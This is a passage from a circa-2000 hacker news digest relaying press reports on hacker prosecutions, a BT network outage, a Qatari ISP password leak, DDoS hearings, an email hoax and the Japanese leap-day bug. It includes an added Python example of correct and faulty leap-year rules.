       into police custody, placed under formal investigation for having
       fraudulently accessed the system, and dismissed from his job for
       gross misconduct. 

       500 francs a month. Bitter, he observes: "I could have made a little
       money honestly, or a lot of money dishonestly. I was dealing with
       crooks and I lost everything." End of the dream. Since then he has
       been living on 500 francs a month after loan repayments and taxes. 

       At the trial on 21 January, the GIE's lawyer called for an exemplary
       sentence against the "perverse little tinkerer". The public
       prosecutor, placing Serge Humpich in the category of
       "techno-delinquency", accused him of having sought to serve his
       personal interests through a kind of blackmail, but nonetheless asked
       for a half-measure, noting that the maximum penalty for this type of
       offence was seven years. 

       Friday's verdict confirms the judges' mixed convictions in this case. 

       Shaken by the chain of events and very anxious, Serge Humpich had
       hoped for the acquittal his lawyers sought on the grounds of their
       client's honesty. Pushed into wrongdoing, he says, by the very people
       who accused him of fraud, this Alsatian miner's son, a graduate of an
       engineering school in Lyon, regrets nothing despite his current
       situation: "I learned a lot." He also remains the sole holder of the
       secret of the bank cards. 
      
      @HWA
      
93.0  HNN:Feb 26th:BT Network Crashed, Reason Unknown 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by knobcottage 
      
      All 0345, 0845, and 0800 numbers on the British Telecom network crashed
      from 11a.m. on February 26, until early hours of the next day, for
      'unknown reasons' say British Telecom.  0345, 0845 numbers are those
      designated as local call charge numbers and are those used by the
      service industries and most ISPs.  0800 numbers are free numbers used
      for promotions.  BT is still investigating the cause of the crash.
      
      The Guardian Observer
      http://www.newsunlimited.co.uk/Breaking_News/UK/0,2478,35055,00.html
      
      We Don't Know Cause Of Crash, Says BT

      From the Press Association
      Saturday February 26, 2000 11:42 am

      BT has said it does not know what caused the crash of part of its 
      national network - or if it could happen again. 

      Phone engineers worked through the night to restore the operation of 
      0800, 0845 and 0345 numbers, which were blocked or engaged from yesterday 
      at 11am. 

      The fault hit calls to the Government's flagship NHS helpline, two 
      motoring rescue organisations, gas companies, banks and rail inquiries. 

      "It is likely the problem was a malfunction in the system than to do 
      with call volumes, but we do not know for absolute certain," a BT 
      spokesman said. 

      "There is an urgent need to establish what happened. We have no 
      indication yet as to what caused this problem, where it started or if it 
      could happen again." 

      Among the worst-affected services were the NHS Helpline, the AA, the 
      RAC, British Gas, pipeline operator Transco, National Rail Inquiries, 
      banks, Virgin, the RSPCA, the Samaritans, and some Internet service 
      providers. 

      The problem began when two of the three BT computers handling 
      reduced rate calls and freephone numbers crashed for an unknown reason, 
      triggering a massive logjam. 

      BT said that two main gateways to the network, at Cambridge and 
      Leeds, were affected by the problems, leaving the remaining one in Croydon 
      swamped with calls. 

      The spokesman said: "We will be monitoring the network closely as 
      call volumes increase and work will also continue both to establish the 
      root cause of the incident to ensure that this problem does not recur." 

      The Department of Health confirmed that difficulties getting through 
      to the NHS Direct service were down to BT. The round-the-clock service 
      normally receives around 8,000 calls a day. 
      
      
      @HWA
      
94.0  HNN:Feb 26th:ISP Loses User Names And Passwords
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by mothy 
      
      The only ISP in the small Middle Eastern country of Qatar had at least
      one third of its customer information released to CD and sold on the
      streets of the capital city of Ad Doha. The ISP, QTel, denied the
      allegations until the information was made public.
      
      Wired
      http://www.wired.com/news/politics/0,1283,34515,00.html
      
      Internet Scandal in Qatar 
      by Jihad Abdullah 
      
      3:00 a.m. 24.Feb.2000 PST 
      DUBAI, United Arab Emirates -- Thousands of Qataris have finally 
      discovered why their Internet access bills inexplicably soared like the 
      price of oil in recent weeks: Their usernames and passwords were being 
      sold on CDs. 

      More than 6,000 usernames and their relevant passwords were being sold in 
      the capital city of Ad Doha and other cities for between 500 and 1,000 
      Qatari riyals (US$137-275) over the past several weeks. 

      
      Many of the usernames and passwords apparently belonged to corporate 
      accounts of several ministries, major companies, and even the Emiri 
      (Royal) Court. 

      The affected accounts total about one-third of Internet users in Qatar, 
      according to a recent survey by Internet Al Alam Al Arabi magazine. 

      The culprit remains a mystery as finger-pointing runs rampant. 

      Qatar's only ISP, QTel, has admitted a leak, and said it averted 
      continuing problems by launching an email campaign asking subscribers to 
      change their passwords. 

      Qatar's former minister of justice, Najeeb Noaimi, claimed credit for 
      uncovering the scandal in his weekly column in Al Sharq Daily and on 
      national TV. But he said that was only after he was rebuffed in his 
      attempts to communicate the problem with QTel. 

      "I gave a copy of the CD to QTel's GM, but nothing was done," Noaimi said. 
      "Then I warned them and they didn't respond. Now I have to go public and 
      tell the story."

      
      Noaimi blames QTel staff members for the security breach, and said the CD 
      focused on large corporations that might not notice discrepancies in their 
      bills. Typical Internet access charges in Qatar amount to the equivalent 
      of US$3 an hour. 

      Some corporations, including the Al Sharq newspaper, did notice the 
      difference. "We used to get a monthly bill of QR3,000 ($820). Suddenly in 
      December, we got a bill of QR15,000," said editor Abdulaziz Almahmoud. 

      "What was strange is that whenever we changed our password, we found it is 
      leaked the next morning." 

      Almahmoud's bill for January was more than QR170,000 ($46,500), which he 
      refused to pay. 

      Individual accounts also were affected. One Qatari reportedly received a 
      bill of QR60,000 (US$16,500) for service in January. 

      Qatari law mandates that the use of an unauthorized account to access the 
      Internet can be charged as a theft crime. 

      QTel, which is owned by the government as well as local and foreign 
      investors, issued a statement on Monday blaming Noaimi for the 
      distribution of the CD. 

      "He is involved in the leakage of this CD to hurt the reputation of QTel, 
      and we will consider a case against him," the statement said. 

      Noaimi said he welcomes such a case so he can expose the truth. He said he 
      was originally given a copy of the CD following a rash of complaints about 
      the sudden rise in access bills. 

      Almahmoud said that according to a threat he received, the newspaper risked 
      losing QTel ads if he published information about the leak. 

      QTel officials were told not to comment on the issue. "We were told not to 
      speak until this thing is over. If I talk to press, I may get fired," one 
      employee said. 
      
      @HWA
      
      
95.0  HNN:Feb 29th:Senate Hearings on DDoS Attacks Today
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Brian and Ted
      
      A hearing will be held today by a Joint Oversight Committee entitled
      "Internet Denial of Service Attacks and the Federal Response".  The
      hearing will be held today at 2:00pm in room 2141 of the Rayburn House
      Office Building. 
      
      Witness List
      - the last name on this list is rather interesting
      http://www.senate.gov/~judiciary/wl22920j.htm
      
      (It's "mudge" from the l0pht.. ;) -Ed )
      
      
      Industry Says No New Laws
      Today's Joint Oversight Hearing regarding the recent DDoS attacks is
      likely to result in industry leaders asking Congressional members not to
      pass more laws. Many industry leaders are more concerned about restoring
      online business quickly than enduring a protracted legal investigation.
      
      San Jose Mercury News
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/260790l.htm
      
      Need for hacker laws downplayed
      BY TED BRIDIS AP Technology Writer 

      WASHINGTON (AP) -- Even amid dramatic attacks by cyber vandals on some of 
      the Internet's flagship Web sites, the nation's technology industry 
      appears reluctant to ask Congress for new or expanded anti-hacker 
      measures.

      The industry appears to be maintaining its traditional reluctance against 
      inviting government into its affairs, even in its defense against hackers 
      and online vandals.

      Those sentiments, expected to be delivered to lawmakers at a congressional 
      hearing Tuesday, illustrate the gulf between Washington and the high-tech 
      industry beyond the 2,400 miles physically separating the epicenters of 
      the two cultures.

      Panels from the House and Senate Judiciary committees organized Tuesday's 
      hearing to determine what changes, if any, they need to make to existing 
      crime laws in the wake of electronic attacks earlier in February that 
      disrupted for hours Web sites run by Yahoo!, Amazon.Com, eBay, ETrade and 
      others.

      But industry leaders, anxious about an expanded government presence, 
      appear uninterested. Companies are worried about bad publicity or poor 
      consumer confidence if they're identified in court as victims. Many are 
      more concerned about restoring online business quickly than enduring a 
      protracted legal investigation that results in the arrest, for example, of 
      a misguided college student.

      ``Infrastructure security ... does not lend itself to government 
      management,'' Microsoft's chief information security officer, Howard 
      Schmidt, said in remarks prepared for the hearing. ''... The private 
      sector has the knowledge and expertise to help fight against computer 
      crimes on the infrastructures on which they operate.''

      Schmidt warned lawmakers against ``unnecessary outside regulation or 
      interference in the operation of dynamic, very productive businesses.''

      The FBI still is trying to trace the origin of the assaults, which used 
      dozens of ``zombie'' computers nationwide where attack software had been 
      implanted and activated by hackers. The technique, called a ``denial of 
      service,'' is similar to programming fax machines to dial a company's 
      telephone number repeatedly to prevent other incoming calls.

      Rep. Bill McCollum, R-Fla., chairman of the House crime subcommittee, was 
      expected to poll federal authorities and technology executives whether 
      existing laws against hacking -- which typically prohibit breaking into 
      computers -- can be used to prosecute vandals in denial-of-service 
      attacks.

      In most of the recent attacks, the companies and their Internet providers 
      successfully filtered incoming ``junk'' data within hours to restore 
      service to their Web sites. Yahoo!, for example, indicated that financial 
      losses from the attack weren't serious.

      ``The technology industry showed that it can respond swiftly and 
      effectively, taking steps to quickly beat back the attacks to make it 
      harder for similar assaults to succeed in the future,'' Charles Giancarlo, 
      a senior vice president for Cisco Systems Inc., said in prepared 
      testimony.

      Cisco, which makes computer hardware used by many of the major sites, 
      helped stem the attack against the online auction site, eBay Inc.

      Giancarlo added: ``We do not ask Congress for new laws in the area of 
      Internet security.''

      An executive for Amazon.Com Inc., whose Web site fell under attack for 
      more than an hour late Feb. 8, did not identify in his testimony any new 
      laws the FBI might need, although the company said it supports better 
      training and more money for federal agents to become digital detectives.

      ``Current laws ... appear to provide some prosecutorial authority and have 
      been used successfully in several recent hacking cases,'' Paul Misener, 
      Amazon's vice president for global public policy, said.

      Congress has already offered to write new laws or change existing ones to 
      protect Internet companies. Sen. Kay Bailey Hutchison, R-Texas, has 
      promised new legislation to double the penalties for hackers to 10 years 
      in prison for a first offense and 20 years for a second offense.

      Sen. Patrick Leahy, D-Vt., wants to amend federal wiretap laws to make it 
      easier for authorities to trace vandals from the ``zombie'' computers 
      where they implant their attack software. Under current law, agents 
      require a wiretap order to examine data traffic flowing through those 
      computers, even with permission from the machine's owner.

      Others outside Congress are worried that lawmakers' eagerness to help 
      trace attacks against lucrative technology companies -- which are 
      gradually becoming powerful players in Washington -- could result in 
      draconian surveillance networks.

      ``It is clear that the private sector is stepping up its security efforts, 
      with an effectiveness that the government could never match,'' said James 
      X. Dempsey of the Center for Democracy and Technology. ''... The 
      potential for the government to help is limited, while the risk of the 
      government doing harm is very high.''
      
      
      @HWA
      
96.0  HNN:Feb 29th:NSA and CIA Form Third Secret Agency SCS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      The French newspaper Le Monde has accused the CIA and NSA of creating a
      third super secret agency named Special Collection Service (SCS). Le
      Monde claimed that this organization's role is to defeat various
      encryption technology to allow interception operations to succeed.
      
      Le Monde - French
      
      Cryptome - English Translation of Article
      
      
      
      @HWA
      
97.0  HNN:Feb 29th:Barr Responds To NSA
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Weld Pond 
      
      Last Sunday's episode of 60 Minutes featuring a spot concerning Echelon
      prompted the NSA to draft a letter to Congress in an attempt to spin any
      possible negative coverage.  In response to that letter Representative
      Bob Barr from Georgia has drafted his own letter.
      
      Letter from NSA to Congress
      http://www.fas.org/sgp/news/2000/02/nsalet.html
      
      Letter from Barr to NSA
      http://cryptome.org/barr-nsa.htm
      
      @HWA
      
98.0  HNN:Feb 29th:Title Email Labeled as Internet Terrorism
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by demetrius clinton 
      
      There is a rumor floating around the internet that bananas from Costa
      Rica carry the "flesh-eating" bacteria called necrotizing fasciitis.
      While the email rumor is obviously not true it has prompted the Vice
      President of the International Banana Association (IBA) to label the
      action as "Internet Terrorism". (I think he should probably look up
      terrorism in the dictionary.)
      
      APB News
      http://www.apbnews.com/newscenter/internetcrime/2000/02/25/bananas0225_01.html
      
      
      Banana Rumor Called 'Internet Terrorism'
      E-mail Claims Fruit Spread Flesh-Eating Bacteria 
      
      Feb. 25, 2000 
      
      By David Noack 
      
      ALEXANDRIA, Va. (APBnews.com) -- The
      attack of the killer bananas? 
      
      A trade group says absolutely not and is
      trying to squelch an Internet rumor that has
      been circulating by e-mail claiming that
      bananas from Costa Rica carry the
      "flesh-eating" bacteria called necrotizing
      fasciitis. 
      
      International Banana Association (IBA) Vice President Tim Debus calls the
      rumor "just another case of Internet terrorism like the recent hacker attacks
      on popular Web sites." 
      
      The e-mail, which has been around since late January and is still
      circulating, purports to come from the Manheim Research Institute of the
      Center for Disease Control in Atlanta -- home of the real Centers for
      Disease Control and Prevention (CDC), the respected U.S. government
      agency. 
      
      'Urgent warning' 
      
      The "urgent warning" claims that necrotizing
      fasciitis has decimated the monkey population
      of Costa Rica and that researchers have
      recently discovered "the disease has been
      able to graft itself to the skin of fruits in the
      region, most notably the banana." Readers
      are warned that the infection can eat "2 to 3
      centimeters of flesh an hour" and that
      amputation is likely and death possible. 
      
      After warning readers to avoid buying bananas
      for two to three weeks and advising getting
      medical help immediately if they develop a
      fever, the message attempts to cash in on
      suspicion of government. 
      
      "The FDA [Food and Drug Administration] has
      been reluctant to issue a countrywide warning
      because of fear of nationwide panic," the
      message says. "They have secretly admitted
      that they feel upwards of 15,000 Americans
      will be affected by this but that these are
      acceptable numbers." 
      
      The allegations prompted the CDC to debunk
      the claim, advising that the bacteria usually associated with the disease
      "frequently live in the human body." 
      
      Concerns voiced to CDC 
      
      "The usual route of transmission for these bacteria is from person to
      person," the advisory says. "Sometimes, they can be transmitted in foods,
      but this would be an unlikely cause for necrotizing fasciitis. FDA and CDC
      agree that the bacteria cannot survive long on the surface of a banana." 
      
      A spokeswoman for the CDC said officials have received more than 100
      calls from people wanting to know the source of the claim and whether or
      not it's true. 
      
      The National Necrotizing Fasciitis Foundation, which researches the
      disease and offers support and education services, said the disease is not
      spread the way the hoax claims. 
      
      "The mere ingestion of these bacteria would only make you sick with
      vomiting or diarrhea, and I'm sure this has happened to many people
      already as part of normal human life," said Dr. John Shieh, a consulting
      physician in Los Angeles. "However, this will not cause you to get a
      necrotizing fasciitis. Don't worry about the bananas, anyway. Most of them
      you buy are from the USA." 
      
      Disrupting the economy? 
      
      Debus said the group has not contacted law enforcement and is just trying
      to get the word out that the allegations are false. 
      
      He said the hoax points up another way that cyber-pranksters can disrupt
      the economy. However, Debus said he has not seen any figures indicating
      a decline in banana sales. 
      
      Chiquita Brands International Inc., the banana producer, issued a
      statement denying the allegations. 
      
      "The report currently circulating on the Internet concerning Costa Rican
      bananas being contaminated with a rare bacteria is totally false," the
      company said. "Chiquita has received no reports of such contamination,
      and we have checked with the pertinent U.S. government agencies, which
      also confirm no reports of such contamination." 
      
      This is not the first Internet food hoax. 
      
      KFC targeted for fake chickens 
      
      Earlier this year, Kentucky Fried Chicken (KFC) was hit with the rumor that
      they do not use real chickens in their products, and to make the claim
      appear real, the allegation came from a study purportedly conducted by the
      University of New Hampshire. 
      
      KFC officials released a statement suggesting that the hoax was
      malicious. 
      
      "This Internet hoax is intended to destroy the trust that you have placed in
      KFC to provide high-quality chicken meals at all of our restaurants,"
      company officials said in a statement. "Although we hope that readers of
      the hoax will recognize it as obviously false, we take this or any other
      attack on the quality of KFC's product seriously." 
      
      Rose Miller, a computer security specialist with the Computer Incident
      Advisory Capability (CIAC), which is part of the federal Department of
      Energy, posts hoax information as a public service. 
      
      "We tell people how to do their own evaluations and don't believe everything
      you receive in an e-mail, on Web sites, because anybody can post
      anything," said Miller. 
      
      @HWA
      
99.0  HNN:Feb 29th:DDoS Commentary
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Unprivileged user 
      
      Do the recent denial of service attacks really count as cyber terrorism
      or are they more closely related to cyber vandalism? How much money was
      lost by the companies involved and is that really worth $37 Million of
      our hard earned tax dollars?
      
      Shift
      
      @HWA
      
100.0  HNN:Feb 29th:Two Sites in Singapore Compromised
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Apocalyse Dow 
      
      The computers of Sparkmedia and Pacific Internet in Singapore were
      broken into on September 3, 1999. The perpetrator, a 15-year-old
      student, will most likely receive a sentence of probation as opposed to
      jail time due to his age.
      
      The Straits Times
      http://www.straitstimes.asia1.com/singapore/sin7_0229.html
      (404)
      
      @HWA 
      
       
      
101.0  HNN:Feb 29th:Swedish Intruders Get Probation
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Alex 
      
      Two Swedish youths who had been accused of breaking into computers owned
      by NASA have received probationary sentences. One of the two intruders
      got additional sentencing for using stolen computer equipment and
      committing fraud, for using stolen Internet access accounts.
      
      Hemsidan - Swedish
      http://nyheter.idg.se/display.pl?ID=000229-CS5
      
      @HWA
      
102.0  HNN:Mar 1st:Still No Motive for DDoS Attacks
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by turtlex 
      
      During testimony before the House and Senate Judiciary committees,
      Michael Vatis from NIPC has said that they still are unsure of a motive
      in the recent DDoS attacks. He went on to say that they are also unsure
      if the attacks were carried out by one person or several. According to
      Vatis the FBI is busy tracking down hundreds of which lead overseas,
      hampering the investigation.
      
      Associated Press - via Yahoo
      http://dailynews.yahoo.com/h/ap/20000229/tc/hacker_investigation_17.html
      
      Tuesday February 29 7:11 PM ET 
      FBI: Internet Attack Motive Unknown

      By TED BRIDIS AP Technology Writer 

      WASHINGTON (AP) - Senior law enforcement officials assured Congress on 
      Tuesday ``we are making progress'' despite serious challenges 
      investigating the sensational attacks weeks ago against some of the 
      Internet's most popular Web sites.

      Michael Vatis, head of the FBI's National Infrastructure Protection 
      Center, said federal agents are following ``hundreds of leads,'' and he 
      was optimistic the case will be solved. ``We continue to make good 
      progress,'' he said.

      But there were important questions that Vatis candidly said he couldn't 
      answer, suggesting no arrest was close. The FBI still has no idea of the 
      motive for the Internet attacks or whether one group or several groups 
      were responsible.

      ``I think it's too early to tell,'' Vatis told a joint congressional 
      panel. He said FBI agents were ``looking at possible linkages between all 
      the investigations,'' and responded to one lawmaker that it was unlikely 
      foreign governments were involved.

      Deputy U.S. Attorney General Eric Holder, who also testified, assured 
      lawmakers that ``we are making progress'' and repeated his earlier pledge 
      to ``prosecute these people to the fullest extent that we can.''

      Vatis acknowledged that investigators have been hampered because vandals 
      sought to cover their digital trail by falsifying information within the 
      flood of data that overwhelmed Yahoo!, eBay and other major Internet sites 
      about three weeks ago. The FBI's own Web site was overwhelmed for 
      about three hours in a similar attack on Feb. 18.

      The bureau is frustrated that some computers used in the attacks failed to 
      adequately record useful details, and some of the spurious data that 
      disrupted service at the Web sites apparently was routed through computers 
      overseas.

      ``Because parts of the evidentiary trail have led overseas, we are working 
      through our legal attaches in many U.S. embassies abroad to work with 
      foreign counterparts,'' Vatis said. ``Despite all these challenges, I 
      remain optimistic that the hard work of ... that we will in the end 
      prove to be successful.''

      Panels from the House and Senate Judiciary committees organized the 
      hearing to determine what changes, if any, are needed to existing crime 
      laws.

      Holder and other federal authorities have urged Congress, for example, to 
      reduce the $5,000 minimum in damages that victim companies must suffer 
      before attackers can be prosecuted under federal computer crime laws.

      Holder called the $5,000 minimum ``a potential problem'' that might hamper 
      some prosecutions.

      Some lawmakers, though, indicated they were reluctant to grant sweeping 
      new authority to the federal government.

      ``Passing laws for the mere purpose of sending a message has not proven 
      effective,'' said Rep. Robert ``Bobby'' Scott, D-Va. He said he was 
      worried about consequences on Internet privacy and the technology 
      industry.

      Rep. Bob Barr, R-Ga., said the attacks in February against commercial 
      Web sites amounted to vandalism, not terrorism, and said he was doubtful
      they represented as serious a threat as biological or chemical attacks. 
      
      @HWA
      
      
103.0  HNN:Mar 1st:First Canadian Computer Crime Conviction
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by acoplayse 
      
      A Quebec court Tuesday convicted a 22-year-old man of electronically
      breaking into the computers of various government and corporate
      institutions. This is believed to be the first time a Canadian court
      has passed sentence in such a case. In a 12-page ruling, Quebec Court
      Justice Andre Bilodeau found Quebec City resident Pierre-Guy Lavoie
      guilty under Canada's criminal code of fraudulently using computer
      passwords to perpetrate computer crimes. He received a sentence of 12
      months of probation with community service.
      
      Reuters - via Yahoo
      http://dailynews.yahoo.com/h/nm/20000229/wr/canada_hacker_1.html
      
      Tuesday February 29 7:21 PM ET 

      Canada Court Convicts Hacker for the First Time

      By Patrick White

      QUEBEC CITY (Reuters) - A Quebec court on Tuesday convicted a 22-year-old 
      man of hacking the computers of government and corporate institutions -- 
      the first time a Canadian court has passed sentence in such a case.

      In a 12-page ruling, Quebec Court Justice Andre Bilodeau found Quebec City 
      resident Pierre-Guy Lavoie guilty under Canada's criminal code of 
      fraudulently using computer passwords to perpetrate computer crimes.

      ``The court cannot ignore the fact that the computer world which is poised 
      to face a dazzling expansion and will become, like other types of payment 
      or communications means invented by our societies, the theater of more and 
      more fertile criminal acts,'' the judge wrote.

      Lavoie, a security consultant with the Quebec-based financial institution 
      Desjardins-Laurentian (Toronto:DJNa.TO - news), was sentenced to 12 months 
      of community service and placed on 12 months of probation.

      He was also ordered not to touch a computer or surf the Internet over the 
      next 12 months, except on the job and under surveillance.

      He was found guilty of hacking hundreds of passwords, access codes to 
      break into dozens of unauthorized government and corporate sites in 1998, 
      including the Canadian Department of National Defense, the U.S. military, 
      the Federal Bureau of Investigation and companies such as Bell 
      Canada (Toronto:BCE.TO - news) and the National Bank of Canada 
      (Toronto:NA.TO - news).

      The hacker, and two friends who were discharged, listed the passwords and 
      access codes on a Web site they created called ''Corruption Addicts'' and 
      invited surfers around the world to penetrate computer systems and hack 
      away.

      ``I have learned a lesson,'' Lavoie told reporters at the Quebec City 
      courthouse.

      His lawyer, Claude Dallaire, said that there were no legal precedents for 
      this new form of cyber crime in Canada's history, noting that only a 
      handful of hackers had been arrested in Canada.

      Dallaire said the court's message was loud and clear.

      ``The message is clear. The judge tells everybody, 'Don't play with the 
      Internet, and don't go too far with the Internet, because you are going to 
      pass Go and go to jail,''' she said, referring to the board game, Monopoly.

      ``It is a message that it is a crime, and they shouldn't do it, and they 
      will get punished for it,'' added Crown Prosecutor Pierre Lapointe.

      Lavoie was also convicted on Tuesday of planning to make explosive 
      substances over the World Wide Web, through another Internet site called 
      ``Phaust Laboratories''.

      For that he received a second 12-month community work sentence, to be 
      served concurrently with the first. 
      
      @HWA
      
      
104.0 HNN:Mar 1st:Major Systems Fail in Japan On Leap Day
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by no0ne 
      
      Cash machines, weather and earthquake prediction systems, and even a
      nuclear power plant had problems coping with the recent leap day. Mikio
      Aoki, chief government spokesman, admitted that the Japanese government
      has been careless in preparing for the leap year bug.
      
      BBC
      http://news.bbc.co.uk/hi/english/sci/tech/newsid_660000/660995.stm
      
      Other minor issues were reported at locations around the world.
      
      Nando Times
      http://www.nandotimes.com/technology/story/body/0,1634,500174980-500227322-501095064-0,00.html
      (404)
      
      
      BBC;
      
      Tuesday, 29 February, 2000, 14:40 GMT 
      Leap year computer bug bites

      Japan appears to have suffered alone so far

      Japan has been worst hit by the Leap Year computer bug, a failure by
      computers to recognise the year 2000 as a leap year and add a day on 29
      February. 

      Cash machines, weather and earthquake prediction systems, and a nuclear 
      plant were all affected and the government was forced to admit 
      embarrassing carelessness. 

      Chief government spokesman Mikio Aoki said the government had let down its 
      guard after the New Year, when the millennium bug caused a number of 
      problems. 

      "Because everything went well then, there is no denying we were negligent 
      this time," he said. 

      Elsewhere in the world, the problems were rare and minor. In New Zealand, 
      as many as 4,000 shops had trouble verifying banking transactions and in 
      Singapore the subway system rejected some travellers' cards. 

      No glitches have yet been reported from Europe or the Americas. Computers 
      in the US have failed in leap years before. Four years ago, for 
      instance, Arizona Lottery players could not buy tickets when machines 
      failed. 

      To leap or not to leap

      The problem results from an exception to an exception in the rule 
      determining which years are leap years and therefore have an extra day, 29 
      February. 

      Generally, leap years occur every four years, when the year is wholly 
      divisible by four. However, years that are wholly divisible by 100 are not 
      leap years. The confusion has arisen because not all programmers were 
      aware that those years that are wholly divisible by 400 remain leap years, 
      meaning 2000 is in fact a leap year. 

      The failures in Japan, one of the world's most technologically-advanced 
      nations, are embarrassing. They follow high-profile space rocket failures, 
      last year's nuclear accident and hacker attacks on government computers,
      as well as difficulties with the millennium bug
      at the start of 2000. 
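
      The rule described above, as an added example (not part of the BBC
      article or of this issue): Python comparing the full leap-year rule with
      two incomplete variants and showing what each does to 29 February 2000.
      All function names are made up for the illustration.

```python
"""Leap-year rule variants and what each does to 29 February 2000.

Added illustration; every function name here is made up for the example.
"""
from datetime import date

MONTH_DAYS = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)


def is_leap_gregorian(year):
    """Full rule: divisible by 4, except centuries, except every 400th year."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def is_leap_missing_400(year):
    """Incomplete rule from the article: century exception, no 400 exception."""
    return year % 4 == 0 and year % 100 != 0


def is_leap_every_4(year):
    """Simplest rule: every fourth year, no exceptions."""
    return year % 4 == 0


def days_in_month(year, month, leap_rule):
    """Length of a month under the given leap-year rule."""
    if month == 2 and leap_rule(year):
        return 29
    return MONTH_DAYS[month - 1]


def is_valid_date(year, month, day, leap_rule):
    """Date validation as a card reader or cash machine might perform it."""
    return 1 <= month <= 12 and 1 <= day <= days_in_month(year, month, leap_rule)


def days_since_1970(year, month, day, leap_rule):
    """Serial day number (1970-01-01 = 0) computed with the given leap rule."""
    total = sum(366 if leap_rule(y) else 365 for y in range(1970, year))
    total += sum(days_in_month(year, m, leap_rule) for m in range(1, month))
    return total + day - 1


def weekday(year, month, day, leap_rule):
    """Monday = 0 ... Sunday = 6; 1970-01-01 was a Thursday (3)."""
    return (days_since_1970(year, month, day, leap_rule) + 3) % 7


def disagreements(leap_rule, first_year, last_year):
    """Years in [first_year, last_year] where leap_rule differs from the full rule."""
    return [y for y in range(first_year, last_year + 1)
            if leap_rule(y) != is_leap_gregorian(y)]


if __name__ == "__main__":
    names = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")
    for rule in (is_leap_gregorian, is_leap_missing_400, is_leap_every_4):
        print(rule.__name__)
        print("  accepts 2000-02-29:", is_valid_date(2000, 2, 29, rule))
        print("  2000-03-01 falls on:", names[weekday(2000, 3, 1, rule)])
        print("  wrong years 1900-2100:", disagreements(rule, 1900, 2100))
    # Cross-check the full rule against the standard library.
    assert days_since_1970(2000, 3, 1, is_leap_gregorian) == \
        (date(2000, 3, 1) - date(1970, 1, 1)).days
```

      The simplest every-fourth-year rule gets 2000 right; only the variant
      that knows the century exception but not the 400-year one rejects the
      date and runs a day behind from 1 March 2000 onward.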
      
      @HWA
      
105.0 HNN:Mar 1st:HP's Cyber Insurance Takes a Hit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acoplayse 
      
      Concerns are being raised that HP's new cyber intrusion insurance
      package does not go far enough. It is thought that putting a commercial
      value on damage caused by such intruders might escalate rather than
      contain the problem. An analyst with Strategy Partners said that HP's
      $2m worth of coverage offered for an annual premium of $57,000 was
      nowhere near enough, particularly for financial organizations. "Denial
      of service will cost them millions of dollars every minute that they
      are out of business," he warned. (Millions of dollars every minute?
      I would sure like to invest in any company making millions of dollars a
      minute.)
      
      Silicon.com
      http://www.silicon.com/public/door?REQUNIQ=951720818&6004REQEVENT=&REQINT1=36001&REQSTR1=newsnow
      
      
      @HWA
      
106.0 HNN:Mar 1st:Security Accountability is Still Low
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acoplayse 
      
      CIOs of new Internet startups and e-commerce companies are not being
      held accountable by stockholders or the venture capitalists when it
      comes to security. Stockholders of Internet companies should be asking
      who inside the company is responsible and is being held accountable for
      security. If the answer is no one then you can be assured that security
      will continue to be a low priority.
      Most executive management teams choose not to take enough measures to
      protect their customers and systems until after a security incident of
      considerable magnitude has taken place and tend to be reactive instead
      of proactive when it comes to security. (ECommerce companies tend to
      blame cyber intruders when the real culprit is a severe lack of
      security.)
      
      Technology Evaluation
      http://www.technologyevaluation.com/news_analysis/02-00/NA_ST_LPT_02_28_00_1.htm
      
      CIOs Need to Be Held Accountable for
      Security
      L. Taylor - February 28th, 2000
   
      Event Summary 
   
      While law enforcement agencies chase their tails in an
      international hacker hunt, hosting providers and
      eCommerce CIOs have surprisingly escaped the wrath of
      accountability. Stockholders of Internet companies
      should be asking who inside their investment holding is
      responsible and is being held accountable for security. If
      no one is held accountable, you can be assured that
      security will continue to be a low priority. 
   
      All too often in Internet companies, security is an
      afterthought. The executive management team chooses
      not to take enough measures to protect its customers
      and systems until after a security incident of
      considerable magnitude has taken place. This consistent
      pattern of locking the barn door after the horse has
      been stolen has been going on in Internet companies for
      years. In fact, it is incredible that many large-scale
      corporations have experienced significant security
      violations and have managed to keep these violations
      from reaching the front page of the Wall Street Journal. 
   
      Some hosting providers knowingly expose customers on
      insecure backend networks simply because internally
      security is not given a high-enough priority. Typically,
      getting new customers up and running has a lot higher
